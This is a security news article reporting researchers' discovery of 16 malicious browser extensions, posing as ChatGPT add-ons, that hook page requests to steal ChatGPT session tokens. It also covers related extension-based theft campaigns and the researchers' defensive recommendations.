LayerX researchers discovered 16 malicious browser extensions that steal ChatGPT session authentication tokens, the browser security company said in a blog post Monday. The extensions, advertised as “ChatGPT mods,” use a content script injected into the ChatGPT web page’s MAIN JavaScript world to hook the window.fetch function and eavesdrop on all outbound requests to OpenAI’s servers.Then, when the extension detects a request containing an authorization header, it retrieves the session token from the header and sends it to the attacker’s server.This token could allow the attacker to impersonate the user’s session and gain the same access as the user, including the ability to see conversation history and potentially gain information from connected apps such as Google Drive, Slack or GitHub.The extensions are associated with the domains chatgptmods[.]com and imagent[.]tech, with 15 apps published to the Chrome Web Store, and one published to the Microsoft Edge Add-ons marketplace. The extensions had a total of about 900 users when they were discovered by LayerX.One of the extensions, “ChatGPT folder, voice download, prompt manager, free tools – ChatGPT Mods” had a “Featured” badge in the Chrome Web Store, indicating it “Follows recommended practices for Chrome extensions.” All 16 extensions were still available for download in their respective marketplaces as of Monday afternoon.LayerX noted that these extensions do not exploit a vulnerability in ChatGPT but instead leverage browser permissions to interact with the ChatGPT page’s native JavaScript runtime.The researchers recommended organizations treat any extensions that claim to integrate with authenticated AI platforms as high-risk and consider behavior-based extension monitoring solutions, which can detect activity such as suspicious DOM manipulation.Attackers frequently use browser extensions to target sensitive data, including authentication tokens. Earlier this month, Socket’s Threat Research Team discovered five Chrome extensions designed to relay authenticated Workday, NetSuite and SuccessFactors sessions and disrupt account recovery efforts.In December, Koi Security found a “Featured” Chrome extension disguised as a VPN was exfiltrating users’ conversations with various AI platforms, including ChatGPT, Google Gemini and Microsoft Copilot, to a remote server.Huntress also reported last week that a malicious Chrome extensions marketed as an ad blocker was used to deploy a ClickFix variant called “CrashFix,” which purposely crashed the browser to convince users to copy and paste malicious “repair” commands to their Windows terminal.
Application security, Threat Management, AI/ML, Identity, Threat Intelligence, Generative AI, Decentralized identity and verifiable credentials
Researchers find 16 browser extensions stealing ChatGPT session tokens
(Credit: Rizq – stock.adobe.com)
Related Events
Get daily email updates
SC Media's daily must-read of the most current and pressing daily news
You can skip this ad in 5 seconds